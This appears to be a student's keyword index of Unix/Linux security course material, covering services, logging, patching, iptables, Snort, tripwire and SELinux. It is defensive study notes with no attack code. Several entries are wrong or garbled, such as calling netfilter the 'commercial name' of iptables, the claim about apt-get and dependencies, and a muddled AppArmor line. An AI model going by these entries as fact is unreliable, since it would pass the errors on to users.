/etc/services                        6     76     connect port numbers to protocols, have a list for all services telnet 23/tcp
xinetd                               6     77     eXtended InterNET service daemon, more security features than inetd, & replace it
xinetd                               6     77     (performs access control, helps prevent DOS attacks, logs all sorts of info, binds IP address to service) & can start services not listed in /etc/services
xinetd access control                6     77     can be done by ip, domain, hostname, time of access
xinetd prevent DOS                   6     77     limits no. of connections any host can make and how many incoming requests will be answered at a time; kills the service if limits are exceeded, so it protects against DOS and port scans
xinetd network filter                6     78     admin can bind a specific service to specific ip
cron                                 6     79     scheduler daemon (crond), starts an action (in the background) at a preset time, /etc/crontab --> crontab file in user home dir (for users)
/etc/crontab                         6     79     min(0-59), hour(0-23), day of month(1-31), month(1-12), day of week (0 or 7 is sun) runas(this field for debian) command path
system boot                          6     81     how UNIX system boots: 1- bootloader, 2-kernel , 3-init, 4-startup script
boot loader                          6     81     prepare the system to begin kernel, have 2 stages ( 1- MBR, 2- loader program that actually run unix kernel)
MBR function                         6     81     usually runs a more complex boot loader from elsewhere on the system disk like: GRUB (Linux), openboot (Unix)
kernel                               6     82     software responsible for (initializing & managing HW resources, handling communication between apps and HW devices)
init process                         6     83     starts up some initial system processes that allow other processes to be run; these processes manage the system, e.g. virtual memory system and process scheduler
start-up scripts/run level scripts   6     84     run by init; init runs one or more start-up scripts (run level scripts), which actually start the programs and services that most users interact with
boot loader password                 6     85     adv: attacker must have physical access, disadv: admin also needs physical access (if power outage or system reboot)
lilo.conf                            6     85     one type of boot loader, add 2 lines at the top of the file to make passwd to boot loader (password=<your password>, then restricted)
grub.conf                            6     85     one type of boot loader, add one line at top of the file to make a password to boot loader (password --md5 <md5hash>)
run levels                           6    86,87   init selects which set of scripts to run based on run level, run level is defined in /etc/inittab file, each unix system has its own run levels
inittab                              6     88     defines the run levels, and is divided into: 1st section (passes default run level), 2nd contains (location of the script to be run before all others), 3rd (locates all run condition dirs on the system) e.g. when alt-ctl-del is pressed, UPS poweroff, no. of ttys started
run condition (level) dir            6     89     /etc/rcX.d, normally there's one directory for each run condition, file starts with S or K
/etc/rcX.d                           6     89     run (condition) level dir, normally there's one directory for each run condition, file starts with S or K
/etc/init.d                          6     90     to control scripts (/etc/init.d/abc start|stop|restart), service not actually in rc directory, the rc dir just has link to each service that is in /etc/init.d

service management                   6    91,92   if you don't need a service turn it off; update and patch all services, running or not, to: 1- prevent local exploits by unprivileged users, 2- have them patched in case of re-enabling them

service command                      6     93    service <servicename> [start|stop|restart] , service --status-all -->get status of all services.
chkconfig command                    6     94    provides an overview of what services are started & what started @ each run level, chkconfig --list, chkconfig --level <#> <servicename> <on|off>
common services                      6     95    file sharing (nfs,samba), naming (dns, nis/nis+), rpc (portmapper), internet (web,email)
file sharing                         6     95    NFS, samba
NFS (Network file System)            6     96    provides transparent file access for clients to files and filesystems on a "server A", file sharing implemented as an rpc service on UDP port 2049
NFS client                           6     97    mount <serverip>:<sharename> <mountpoint>, any attempt to look in the mount point causes an rpc to the server and displays content from the server
samba                                6     99    software run on unix/linux allowing a host to interact with a windows client or server as if it were a windows file and print server; this interaction is like connecting or disconnecting directory mappings and printer shares on Microsoft systems, using the SMB protocol [unix implementation of SMB]
DNS basic                            6     100   when a user needs to look up an FQDN, the system requests the info from a predefined DNS server; DNS saves cache normally for 24hrs.
NIS (Network Information Service)    6     101   client-server model (provides central admin control of user accounts over the network), server contains data files called maps, client requests info from maps, master server has the true data file which must be rebuilt and redistributed if changed.
NIS+                                 6     101   is like NIS, but provides more security.
RPC (remote Procedure Call)          6   102,103 client-server based; it is set up so that the client calls functions in the server program
RPCSec                               6     102 is the secure version of RPC
port Mapper                          6     104   when an rpc starts on a computer it registers with the portmapper service, so portmapper tracks all rpcs running on the system; uses UDP port 111 and TCP port 111; it's a registrar that keeps track of which rpc programs are using which ports

port Mapper                          6     104    services register with the PortMapper and clients query it; PortMapper can provide info on all of these RPCs to remote computers that desire their service
LOCKD                                        6     105     rpc service run by both client and server, it handles file locks
STATD                                        6     105     rpc service run by client and server, this service handles status of file locks
AUTOMOUNTD                                   6     105     rpc service mount and umount NFS resources only when needed
RSH                                          6     105     rpc service allow a user to get a remote shell
RCMD and REXD                                6     105     rpc service allow execution of program or part of program remotely
REXD and RCMD                                6     105     rpc service allow execution of program or part of program remotely
inetd                                        6     106     Internet service Daemon "Super Server" used to manage most of tcp/ip daemons
xinetd                                       6     106     config file in /etc/xinetd.conf /etc/xinetd.d
inetd - examples from /etc/inetd.conf file   6     107
service name- Linux                          6     107   all services are defined at /etc/services
/etc/inetd.conf                              6   108,109  its fields: service name, socket type (stream,dgram,sunrpc_tcp,sunrpc_udp), protocol name (TCP|UDP or any protocol in /etc/protocol), wait (for stream or dgram)|nowait (for dgram), server path, server args (max no. is five); any line starting with # is a comment
protocol - Linux                             6     107 any protocol in /etc/protocol
xinetd                                       6     109    built-in control mechanisms such as TCP Wrapper ACL, more logging options, built-in support for warning banners, resource thresholds, redirecting the service to services on other ports or other systems
/etc/xinetd.conf                             6     110 the global xinetd configuration file, read once when the xinetd service is started, some defaults in it (instances, log_type, log_on_success, log_on_failure, cps)
/etc/xinetd.d dir                            6     111 directory containing all service-specific files; dir contains the config file of each service managed by xinetd; these files are read only when xinetd is started
tcpwrapper                                   6   113,114 is simply a utility that can be used for logging and intercepting TCP and UDP services started by inetd or xinetd; host-based network ACL system, used to filter network access to Internet Protocol services on UNIX systems; can place a banner on any tcp or udp service
tcpwrapper                                   6     114 acts as a proxy between the client and the real service connection, can monitor & filter SYSTAT, Finger, FTP, Telnet, Rlogin, Rsh, TFTP, Talk and …
tcpwrapper - Before it ?                     6     115 without a host-based firewall or ACL, access to a service is a direct connection
tcpwrapper - After it ?                      6     116     with tcpwrapper installed (as tcpd), all connections must pass through a set of rules before being allowed to connect to the service, checked at /etc/hosts.allow, /etc/hosts.deny
tcpwrapper                                   6     117     can also perform double-reverse IP address lookup, bannering system, additional logging capabilities
tcpwrapper                                   6     118     can alert the network admin of suspicious activity by sending SMS or Mail to the Admin
log files                                    6     122     Binary Log Files (utmp,wtmp,lastlog), Text Log Files (history files, sulog, httpd, syslogd, messages/syslog, secure, ftplog, maillog)
wtmp log                                     6     123     binary log file keeping track of logins and logouts, shutdowns and reboots (tracks intruder activities); similar to UTMP but grows in length and keeps historical data; because it is a binary file it's used by the last command (/var/log/wtmp), more info than lastlog
last command                                 6     124     uses wtmp log, its output is: (userID, terminal ID, remote host ID, connection date, time on, time off, session time), & it is read in reverse order.
utmp log                                     6     125     binary log file, keeps track of users currently logged in, used by (w, finger, who) commands, updated by the login program, world writeable so it is inaccurate /var/run/utmp
finger command                               6     125     used to display the UTMP log file.
who command                                  6     125     used to display the UTMP log file.
w command                                    6     126     uses utmp log file, its output is: ( user, TTY, FROM, LOGIN@, IDLE, JCPU, PCPU, WHAT )
lastlog                                      6     127     binary log file, keeps track of each user's most recent login date & time, records initiating IP address, displayed each time the login program is run
sulog                                        6     128     records the usage of the su command, used by hackers to switch to usernames that have rlogin to other machines or su to get root access, found in solaris and irix, /var/adm/sulog
/var/adm/sulog file                          6     129   file fields: activity (always su) date time +/-(un/successful) terminal starting user ending user
http logs                                    6   130,131 most web servers maintain logs which track the originating IP address of each connection. File entries: originating_IP notused username date&time Actual_text_of_the_request error code (200 ok, 404 file not found) no_of_bytes_returned_to_the_browser
syslog (messages)                            6     132   logs major events, such as su to root and failed login attempts; may need root level to view logs generated by syslogd; its path is /var/log/messages, solaris --> /var/adm/messages, IRIX --> /var/adm/SYSLOG, HP-UX --> /usr/adm/syslog
syslog file fields ( messages)               6     133 date time hostname originating_program_name : msg_sent_to_syslogd
syslogd                                      6   134,135 daemon that accepts incoming log msgs and deals with them according to the rules found in /etc/syslog.conf
syslogd                                      6     134 any program which wants to generate log messages may do so through calls to the syslog interface.
/etc/syslog.conf                             6     136 selector (facilities, level of priority)             action
/etc/syslog.conf facilities                  6     137 facility: specifies how the msg was produced as (auth,cron,authpriv,daemon,kern,lpr,mail,news,syslog,user,local0-local6)
/etc/syslog.conf levels                      6     138 priority level (emerg, alert, crit, err, warning, notice, info, debug, none) * --> mean all
/etc/syslog.conf actions                     6     139 how messages should be handled ( file,terminal,remote host,user,fifo file)
ftp logs                                     6     140 WU-FTP tracks incoming connections; solaris, IRIX and other variants typically log only ftp connections. Logs go in the syslog file: ( date time hostname program name : msg sent to syslogd)
ftp logs                                     6     140 Notice: only the FTP connection is logged, not what files were uploaded or downloaded.
xferlog                                      6     140 /var/log/xferlog, ftp logs
/var/adm/SYSLOG                              6     132 IRIX syslog file (date time hostname program name : msg sent to syslogd)
/var/adm/messages                            6     132 solaris syslog file (date time hostname program name : msg sent to syslogd)
/var/adm/syslog                              6     132 HP-UX syslog files (date time hostname program name : msg sent to syslogd)
SGI machine                                  6     141 IRIX unix
/etc/inetd.conf                                       6     142     we can improve ftp logging by adding -l to the ftp line then restarting inetd (it will also log what the user did in the ftp conn., e.g. get, mkdir, ...)
maillog                                               6   144,145   maillog sends its log to syslogd, ( date time hostname program_name : msg_sent_to_syslogd) --> first field in msg is queue id (if multiple entries for a msg each will be associated with the same id)
maillog - queue identification number                 6     145     id no assigned to the msg, appear in msg id of the mail in mail header
logrotate                                             6     147     The logrotate program is a log file manager. It is used to regularly cycle (or rotate) log files by removing the oldest ones from your system and creating new log files. It may be used to rotate based on the age of the file or the file's size, and usually runs automatically through the cron utility. The logrotate program may also be used to compress log files and to configure e-mail to users when they are rotated.
/etc/logrotate.conf                                   6     147     The options entered in /etc/logrotate.conf may be used to set configuration parameters for any log file on the system. (compress,daily,weekly,monthly,size,rotate n,missingok,create)
/etc/logrotate.d                                      6     147     directory containing all the logrotate config. files
/etc/logrotate.conf - include option                  6     147     The include option allows the administrator to take log file rotation information, which may be installed in several files, and use it in the main configuration file. When logrotate finds the include option on a line in logrotate.conf, the information in the file specified is read as if it appeared in /etc/logrotate.conf.
/etc/logrotate.conf - weekly option                   6     147     This is used to rotate log files weekly
/etc/logrotate.conf - monthly option                  6     147     This is used to rotate log files monthly
/etc/logrotate.conf - daily option                    6     147     This is used to rotate log files daily.
/etc/logrotate.conf - size option                     6     147     the log file is rotated when the specified size is reached. Size may be specified in bytes (default), kilobytes (sizek ), or megabytes (sizem ).
/etc/logrotate.conf - rotate option                   6     147     This specifies the number of times to rotate a file before it is deleted. A count of 0 (zero) means no copies are retained. A count of 5 means five copies are retained.

/etc/logrotate.conf - create option                   6     147     This rotates the log file and creates a new log file with the specified permissions, owner, and group. The default is to use the same mode, owner, and group as the original file.
/etc/logrotate.conf - missingok option                6     147     tells the logrotate to continue to the next file if the file doesn't exist rather than quit with an error
/etc/logrotate.conf directive {}                      6     148     Configuration parameters for a specific file are often required. A common example would be to include a section in the /etc/logrotate.conf file to rotate the /var/log/wtmp file once per month and keep only one copy of the log. When configuration is required for a specific file, the following format is used: filename { options }
/etc/logrotate.conf prerotate                         6     149     command that specifies actions to be taken prior to the file being rotated by logrotate.
/etc/logrotate.conf postrotate                        6     149     specifies that the following commands are to be run on the log file after the file has been rotated by logrotate.
/etc/logrotate.conf endscript                         6     149     command marks the end of the prerotate or postrotate portion of this script.
/etc/logrotate.conf sharedscripts                     6     149
logrotate use it instead of /etc/cron.daily/syslogd   6     149
/etc/logrotate.conf error address option              6     net     This mails logrotate errors to an address.
centralized logging                                   6     151     protects from log deletion; DoS possibility (so we need to determine specific machines and use a firewall); needs lots of disk; one machine holds lots of info (use ssh with limited logins and IPs); easy to search and scan (generate single reports)
logwatch                                              6     152     log alert program
logsurfer                                             6     152     log alert program
swatch                                                6     152     log alert program
syslog-NG "next generation"                           6     153     syslog next generation, replacement for syslog (can't reuse syslog.conf); additional filtering (filter by hostname and actual text of the log msg using regular expressions); sends data with tcp; can support windows; not installed by default
syslog-NG installation                                6     153     yum install syslog-ng , install it in fedora
syslog-NG - switch from syslog to it                  6     153     chkconfig --del syslog then chkconfig --add syslog-ng then stop syslog daemon and start syslog-ng daemon
syslog-NG config file                                 6     153     /etc/syslog-ng and uses the same facilities and priorities as the default syslog daemon
syslog-NG filter                                      6   153,154 create a destination (file), then create a filter based on facility, priority, hostname and presence or absence of a string, then create a log rule based on the filters and destination
syslog-NG - drawback                                  6     154     complex in configuration.
syslog-NG over tcp                                    6     154     verifies data so that the log is guaranteed to make it to the remote host; use encryption with stunnel
patching - why ?                                      6     158     1-Everyday new vulnerabilities, 2- Vendors release patches to fix these vulnerabilities, 3- un-patched systems are still a major reason for compromised systems.
patch -new patches impact ?                           6     159     1- app may stop or have unexpected behavior, so test the patch first on a non-production system, 2- some patches need a reboot; test patches on non-production systems before distributing the patches widely
patches - how to find new patches                     6     160     1-Automated updates, 2-Vendor Web/FTP site, 3-Mail List
automatic update                                      6     160     not good to be used on a production system, (by yum or up2date "Redhat update agent" or synaptic "apt")
up2date                                               6     160     automatic update tool ( redhat update agent)
apt                                                   6     161     Advanced Package Tool, update tool for debian-based linux such as knoppix and ubuntu, packages with .deb extension
apt-get                                               6     161     stores a DB of your version & then contacts the website to tell you the differences; it'll also tell you about the dependencies but won't install them.
apt-get update                                        6     161     update local DB of available package
apt-show-versions -u                                  6     161     check and see which packages need updating
apt-get upgrade                                       6     161     download and install upgrades
apt-show-versions -a pkgname                  6     162     show all available versions of a given package
apt-get install pkgname                       6     162     install new pkg
apt-get remove pkgname                        6     162     remove pkg
rpm                                           6     163     package manager solution for redhat linux
rpm -i pkg                                    6     163     install package
rpm -U pkg                                    6     163     upgrade pkg ( if pkg not installed, install it)
rpm -F pkg                                    6     163     freshen pkg( update installed packages)
rpm -q pkg                                    6     164     query to see if pkg is install or error if pkg isn't install
rpm --initdb                                 6     164     create new rpm header db
rpm --rebuilddb                              6     164     update/rebuild the rpm header db
yum install pkgname                           6     165     to install pkg with yum
yum check-update                             6     165     gives a list of what needs to be updated ( look for patches ( aka update software))
yum update                                    6     165     download the updates and install them( and it may take a lot of bandwidth and time)
yum                                           6     166     GUI tools use rpm to install,upgrade,remove pkg (redhat & fedora)
up2date                                       6     166     GUI tools use rpm to install,upgrade,remove pkg (redhat & fedora)
synaptic                                      6     166     synaptic/AWinApt GUI tools use apt to install,upgrade,remove pkg (debian)
QWinApt                                       6     166     synaptic/QWinAPT GUI tools use apt to install,upgrade,remove pkg (debian)
solaris pkg manager                           6     167     pkgadd,pkgrm,pkgchk
HP-UX pkg manager                             6     167     swinstall,swremove,swverify
BSD pkg manager                               6     167     pkg_add,pkg_delete
tripwire                                     6     171     intrusion detection through integrity checking, has 2 versions: (commercial & open source), creates a secure db of file and dir attributes, can include MD5 signature for data verification
tripwire portable db                         6     171     tripwire creates a digital snapshot of files and/or dirs and places; db should be maintained off-site and secure
tripwire log file attribute                   6     172     access time,mod.time,size,inode creation time,content
tripwire perm and file mode attr              6     172     inode,no of links,user,group
tripwire steps                                6     173
tripwire -mi -v                               6     173     run tripwire in init phase ( create db) with verbose output
tripwire -mc -v                               6     173     run tripwire in check phase with verbose output
twprint -mr --twfile filename                 6     173     read tripwire report
ipfwadm                                       6     174     old builtin firewall
ipchains                                      6     175     old builtin firewall
iptables                                     6     175     current packet filtering; it is modular (can check packets that are not part of iptables by adding a new test to the kernel without reboot and defining the action to take, fast), & can work as a NAT box.

netfilter                                     6     175     is the commercial name of Iptables

iptables downside                             6     175   focus on packet headers only
linux proxy applications                      6     175   squid (Web and FTP), bind (for DNS), postfix (for e-mail). & can coexist with Iptables
squid                                         6     175   is a Linux proxy application used for Web & FTP, & can coexist with Iptables.
bind                                          6     175   is a Linux proxy application used for DNS, & can coexist with Iptables.
postfix                                       6     175   is a Linux proxy application used for e-mail, & can coexist with Iptables.
iptables basics                              6     176   the iptables cmd tells the kernel what to check and the kernel does the actual check (from top of the rules list down); if it finds a match it takes the action
iptables {checks} {action} command           6     176   perform this action if the packet matches all checks, else continue to the next rule; this builds up the kernel table
iptables -I FORWARD|INPUT|OUTPUT             6   177,179 FORWARD --> filter packets to a server accessible by another NIC on the firewall (going through the system), INPUT --> filter packets destined to the firewall (coming into the system), OUTPUT --> filter packets originating from the firewall (created by the system)
iptables- NAT                                6     178   two built-in chains to place NAT policy rules: Pre-routing chain --> NATs packets when the dest. address of the packet needs to be changed, Post-routing chain --> NATs packets when the source address of the packet needs to be changed
iptables -s (or --source) ip or ip/mask      6     176 source address ip or network (used to block an attacker)
iptables -d (or --destination) ip or ip/mask 6     176 destination ip or network
iptables -j DROP|ACCEPT|REJECT|LOG           6   176,181 action taken ( ACCEPT --> accept packet, REJECT --> reject packet and notify the sender, DROP --> silently ignore the packet, LOG --> log the packet and continue processing more rules)
iptables -p tcp                              6     176     protocol used
iptables --sport                             6     182     source port ( single port or port range as start:end )
iptables --dport                             6   176,180   destination port ( single port or port range as start:end )
nat                                           6     178     2 builtin chains in which to place nat policy rules: pre-routing chain,post-routing chain
pre-routing chain                            6     178     NATs packets when the destination address of the packet needs to be changed
post-routing chain                            6     178     NATs packets when the source address of the packet needs to be changed
iptables -I FORWARD|INPUT|OUTPUT         6   179,181   iptables -I insert at the top of the current rule list, iptables -I chain ruleno( put this in specific chain and make it no x)
iptables -D                              6     179     use the same command as with the -I option, with -D instead, to delete the rule
iptables -L -nxv |less -S                6     179     to see the active firewall rules (-L lists the current filter rules)
firewall rules (chain)                   6     179     FORWARD,INPUT,OUTPUT
iptables -A INPUT …                      6     180     append this rule to a rule chain (put it on the bottom)
iptables --state                         6     180     define list of states for the rules to match on (NEW,RELATED,ESTABLISHED,INVALID)
iptables -m state                        6     180     allow filter rule based on connection state, premit the use of --state option
iptables --limit                         6     180     the max. matching rate given as number followed by (/second,/minute,/hour), if this option isn't used & -m limit is used -->the default is 3 hours
iptables -m limit                        6     180     require the rule to match only a limited no of times ( useful for limitation logging rule), premit the use of --limit option
iptables -j LOG                          6     180     log the packet, and continue processing more rules in this chain, Allows the use of --log-prefix & --log-level
iptables --log-prefix "text"             6     181     when logging, put this text before the log msg
iptables --log-level                     6     181     log using specific log level,7 is good choice
iptables -i                              6     181     only match if packet come from specific interface
iptables -v                              6     181     display more info (useful if u have look similar rules)
iptables -o (--out-interface)            6     181     outname+network interface name (+is wild card)
MS-SQL udp port 1434                     6     182
iptables -p udp -I FORWARD --dport 1434        6     182   to block worm traffic
block worm traffic                       6     182
chkrootkit                                     6    184    free malware scanning tool for the various unixes (acts as a warning system for well-known malware but doesn't give much detail, and it doesn't offer you any removal capability if the system is infected); if you will use it frequently, e.g. in a cron schedule, it's better to run it in "quiet mode" (chkrootkit -q) to show only potential problems.
chkrootkit                                     6    184    looks for rootkits, sniffers, deleted logs, trojans, kernel modules
ramen worm                                     6    185    saves its code in /usr/src/.poop on the infected linux
/usr/src/.poop                                 6    185    the ramen worm saves its code in that directory on an infected linux
chkrootkit command                             6    184    the first time, it will tell you what it's checking for and what it found and did not find
chkrootkit -q                                  6    184    work in quiet mode, where it only shows potential problems
chkrootkit -x                                  6    185    tells you what it found in expert mode
clamav                                         6    186    provides what is closest to the antivirus packages on windows; they update the signature db daily; the current release has signatures for potentially unwanted applications (but it's not enabled by default)
sourcefire                                     6    186    provides commercial support for clamav and sells the snort app and support
clamav installation                            6    186    "yum install clamav"; it will automatically install the clamav-db package as well, and this package contains the initial signature db, which will be updated nightly
clamav-db                                      6    186    installed automatically with clamav and contains the initial signature db
clamscan -r dir                                6    186    to actually scan files
clamscan --detect-pua                          6    186    to enable "Detect Possibly Unwanted Applications"; it's not enabled by default.
clamscan --remove                              6    186    remove known malware
CIS hardening guide                            6    187    CIS comes up with the steps they think should be followed in securing that platform
hardening tools                                6    187    will make some or all of the recommended changes to make your platform secure; free tools
scoring tools                                  6    187    program that rates your system on how secure it is (the no. doesn't have a direct meaning, but it does allow a relative comparison between systems); free tool
redhat benchmark                               6    188    requires the Sun Java runtime env. (specifically version 1.5 (5.0)); don't get anything older or newer
CIS benchmark report                           6    188    the final score is not an absolute no., but it's compared to other CIS benchmark scored systems
Bastille linux                                 6    189    hardening program; reports on how secure the system is and shows security issues (educates the admin): why it should be fixed and what side effects the fix might have; also can optionally fix issues (changes can be reverted); it runs on linux, HP-UX, mac osx
sniffers                                       6    190    copy packets from the network cable (need to be run as root); display a summary of important headers & save them to disk for later reprocessing
specialized sniffers                           6    190    capture passwords, look for attacks; all of them in some form can listen to raw packets flying by on a network cable and show or analyze them
sniffer tools                                  6    190    used if packets are not flowing correctly or there is a network problem to diagnose
tcpdump                                        6    191    one of the earliest sniffers; works on any OS that talks tcp/ip; simple packet header analysis; can decode a few protocols such as NFS and DNS and show the raw payload; filter and restrict what to view
windump                                        6    191    tcpdump for windows
tcpdump cmd                                    6    191    gives a one-line-per-packet summary of each packet
tcpdump -X                                     6    191    see the packet payload; you'll get the hexadecimal and mostly readable payload content
tcpdump -w [filename]                          6    191    save the packets that tcpdump captures to disk
tcpdump -r [.pcapfile]                         6    191    ignore your network interface and read packets from a saved capture file
tcpdump -nn                                    6    191    don't convert addresses or protocol and port numbers etc. to names
tcpdump 'tcp and port 1737'                    6    191    run tcpdump with a filter (put the filter in single quotes at the end of the tcpdump command line)
tcpdump -nnp                                   6    191    tcpdump -p: don't put the interface into promiscuous mode
tcpdump -i lo                                  6    192    listen on the loopback interface (which is a fake network interface)
tcpdump -n                                     6    192    don't make any DNS lookups
tcpdump -v                                     6    192    verbose mode, so you can see the low-level negotiation through more details of the packet
tcpdump fields                                 6    192    timestamp, ethernet packet type (ip), source ip address.source port, destination ip.destination port, flags other than ack ("."), acknowledgement number, window size and tcp options (between < >)
tcpdump                                        6    192    can't decode the application layer protocols except: DNS, NFS
ethereal / wireshark                           6    193    bring sniffing and packet analysis to a new level; first GUI sniffer (needs to run under X Window) --> run "wireshark &" or from the Applications menu, then Internet, then Network Analyzer
wireshark &                                    6    193    to run wireshark in the background, to be able to use the shell again.
wireshark GUI benefits                         6    193    lets you maneuver around packets and headers; it also knows a great deal about the app layer protocols; it has the ability to decode the actual conversation and show you an app layer summary; it provides tools to analyze the packets
wireshark extracts                             6    193    it can extract just the tcp application layer conversations, it can give packet counts by the ip endpoints and it can show Cisco IOS rules that would allow or block this traffic; you can also set advanced filters to only look for a particular conversation or traffic type
tshark -i {interface}                          6    193    if you need to capture and decode the app. layer but don't have access to a graphical display; it displays one line per packet like tcpdump, but it gives the app layer decode that tcpdump generally won't
wireshark session                              6    194    go to the Capture menu and choose Interfaces, pick any interface, then press Start
wireshark stop                                 6    194    returns to the main window with packets summarized in the top third; when you click on any summary line, the protocol headers of that packet show up in the middle window, and the hex decode of the packet shows up in the bottom window
wireshark analyze tool                         6    194    to see the app layer conversation without headers, click on a tcp port 25 packet in the top window and choose "Follow TCP Stream" in the Analyze menu; a new popup shows the smtp conversation (lines from server to client are blue and from client to server are red)
snort                                          6    195    started as a testing tool for honeypot system software; intrusion detection system (runs on anything); it's a powerful sniffer application; free and commercial versions; strong and supplied ruleset; users can add their own rules
snort uses                                     6    196    run in the foreground as an IDS
snort -v                                       6    196    snort in verbose mode; it prints a multi-line summary of each attack
snort -d                                       6    196    print the application layer as well as the default headers
snort -e                                       6    196    show the ethernet mac address or link address for your cable type
snort -i {interface}                           6    196    tell snort to sniff on that interface
snort - to see its output                      6    196    to actually elicit some alerts, we tell nmap to probe for open services on a remote machine in a different terminal window; the port scan will show up in the snort console
snort diff between linux & windows             6    197    snort will do the same job on these platforms since it is compiled from the same source code, but on linux performance will be better; windows systems start to drop packets as the no. of packets and attacks per second goes up
IDS load balancer                              6    197    to distribute the packets on your network to multiple identical IDSs, if you've tuned your IDS for speed and the system still can't keep up
route -n                                       6    197    list the networks with a live route
windump -D                                     6    197    to list the long interface names and a shorthand number; this number can be used after -i
snort operating modes                          6    198    snort as sniffer, snort as packet logger, snort as IDS
snort as sniffer                               6    198    it shows packets on the screen; run it as snort -vd -i lo
snort -vd -i lo                                6    198    snort as sniffer
snort as a packet logger                       6    198    1- make the log dir, 2- snort -vd -l /root/log -i lo; a summary of the packets is kept in the directory tree under one of the ip addresses in the packets
snort -vd -l /root/log -i lo                   6    198    snort as packet logger
snort -h                                       6    198    snort -h <home net>: tells snort which address is local; the other one is used as the packet directory
snort as IDS                                   6    198    snort -vd -l /root/log -c /etc/snort.conf -i lo
snort -vd -l /root/log -c /etc/snort.conf -i lo  6  198    snort as a FULL IDS; this configuration file tells snort which attacks to look for
boot loader password                           6    199    enables additional security validation
ps                                             6    199    monitor your running processes
netstat                                        6    199    identify running services and the connections to each
linux other security options                   6    199    Boot Loader Password, ps, netstat
security options in linux                      6    199    Boot Loader Password, ps, netstat
security enhanced applications - Linux         6    200    SELinux and AppArmor
SELinux                                        6    200    Security Enhanced Linux; enhances the default DAC security of the unix system with the inclusion and management of a MAC security effort
AppArmor                                       6    200    is a SELinux alternative & the only answer is NO, i.e. --> more restricted security rules.
SELinux                                        6    201    a linux security enhancement feature; uses security-based policies based on U.S. Department of Defense style MAC; uses linux security modules (LSM) in the linux kernel
SELinux uses MAC                               6    201    to give the admin the ability to control all interactions of software on the system; the security model is based on least privilege and starts with users having no rights
SELinux uses DAC                               6    201    DAC allows users full security access over their installed and owned applications, leading to security risks to the system
SELinux parts                                  6    202    context of users in relation to an object or subject (file and/or dir); a context --> on a file or dir, has 3 parts: user account, role, type or domain
role                                           6    202    set of permissions granted to a user; ends with _r
user_r                                         6    202    all users are assigned to that role
staff_r                                        6    202    admins are assigned to that role and are allowed to change to and from the sysadm_r role
sysadm_r                                       6    202
SELinux - type or domain                       6    202    assigned to processes so that types of similar function can be assigned similar permissions to applications or the system; ends with _t and is used when referring to an object
object_r                                       6    202    every object must have all three parts of a security context and is assigned by default to the role object_r
SELinux - security policy                      6    203    targeted --> focuses on particular apps and processes; unless identified, the rest of the processes run unrestricted; strict --> manages all processes, and each must be managed individually
setenforce                                     6    203
SELinux DAC                                    6    204    this allows the sys admin and all users to manage the security of files they own or manage
selinux DAC flaw                               6    204    any exploit that allows access to the system as any potential user may be able to elevate themselves or processes they own and defeat or circumvent security
selinux DAC deny                               6    204    will not use selinux access on the object
selinux DAC allow                              6    204    selinux access policy applied
SELinux - MLS/MCS                              6    205    each level is a sensitivity-category pair with the category being optional; when using a category the level is written as sensitivity:category-set (s0:c0.c1023 --> from c0 to c1023); if a category is not used the level is written as sensitivity
MLS/MCS                                        6    205    each level is a sensitivity-category pair with the category being optional; when using a category the level is written as sensitivity:category-set (s0:c0.c1023 --> from c0 to c1023); if a category is not used the level is written as sensitivity
targeted policy enforcement                    6    205    fedora 10 enforces MCS with targeted policy enforcement
MCS                                            6    205
MLS/MCS in fedora 10                           6    205    has only one sensitivity, s0, and supports up to 1024 categories, c0-c1023
MLS                                            6    205    enforces the Bell-LaPadula mandatory access model and is used in labeled security protection profile (LSPP) environments
LSPP                                           6    205    MLS enforces the Bell-LaPadula mandatory access model and is used in LSPP environments
AppArmor                                       6    206    an alternative to SELinux that also uses the LSM framework; interchangeable with SELinux; includes a MAC model that is fully configurable as well as a learning mode; available on suse, opensuse, and ubuntu
pwd                                            6    210    command to print the working directory.
cd <directory name>                            6    211    change directory
ls                                             6    212    list the contents of a directory
touch                                          6    213    to create files or update timestamps
clear                                          6    213    clear the screen of all output
cat <filename>, cat <filename> | more          6    215    to concatenate or display files.
mv <file name> <new file name>                 6    216    move a file from one location to another, or rename it.
cp <filename> <destination>                    6    217    copy a file from one location to another.
mkdir <newdir_name>                            6    218    make a directory
rmdir <dir_name>                               6    219    remove a directory, only if it is empty
rm <file_name>                                 6    220    delete files or directories
su <user>                                      6    221    allow a user to temporarily become another user
sudo                                           6    222
find </> -name <file_name>                     6    224    to search for files within a file system
grep <string> <file>                           6    225    to perform a search for data within files.
man <command>                                  6    226    to read the manual page for any given command
Key Word                                   B      P      Comment
%CPU                                           6     65    ps output; the percentage of CPU the process is using
%MEM                                           6     65    ps output; the percentage of memory the process is using
%systemroot%\security\Templates\               5    146
.INF security template                         5    145
.NET Framework                                 5    234    included in Server 2008 R2, not in Server 2008
.rhosts file                                   3      9    allows a user to use the r-commands without a password; includes machine and local user account
/etc/crontab                                   6     79    min (0-59), hour (0-23), day of month (1-31), month (1-12), day of week (0 or 7 is sun), run-as user (this field is for debian), command path
/etc/default/useradd                           6     56    INACTIVE (no. of days after password expiration until the account is disabled; default -1 means disabled), EXPIRE
/etc/group                                     6     46    system group db --> groupname:group passwd:groupid:group members
/etc/hosts                                     1     72    local hosts file for dns/name resolution; on windows: %systemroot%\system32\drivers\etc\hosts
/etc/inetd.conf                                6     76    config. file for inetd; connects names of services to names of servers, e.g. as tcp with /usr/sbin/tcpd in.telnetd
/etc/inetd.conf                                6   108,109 its fields: service name, socket type (stream, dgram, sunrpc_tcp, sunrpc_udp), protocol name (TCP|UDP or any protocol in /etc/protocols), wait (for stream or dgram)|nowait (for dgram), server path, server args (max no. is five); any line starting with # is a comment
/etc/inetd.conf                                6    142    we can improve ftp logging by adding -l to the ftp line, then restart inetd (it will also log what the user did in the ftp conn., such as get, mkdir, ...)
/etc/init.d                                    6     90    control scripts (/etc/init.d/abc start|stop|restart); the service is not actually in the rc directory, the rc dir just has a link to each service that is in /etc/init.d
/etc/inittab                                   6     74    lists each of the init processes the system should start at boot and stop at shutdown; has 4 fields: id:runlevel:action:full path of the binary
/etc/login.defs                                6     55    PASS_MAX_DAYS --> default 99999 days, PASS_MIN_DAYS --> default 0 days, PASS_MIN_LEN --> default 0 (controlled by PAM), PASS_WARN_AGE --> default 7 days
/etc/logrotate.conf                            6    147    the options entered in /etc/logrotate.conf may be used to set configuration parameters for any log file on the system (compress, daily, weekly, monthly, size, rotate n, missingok, create)
/etc/logrotate.conf - create option            6    147    this rotates the log file and creates a new log file with the specified permissions, owner, and group; the default is to use the same mode, owner, and group as the original file.
/etc/logrotate.conf - daily option             6    147    this is used to rotate log files daily.
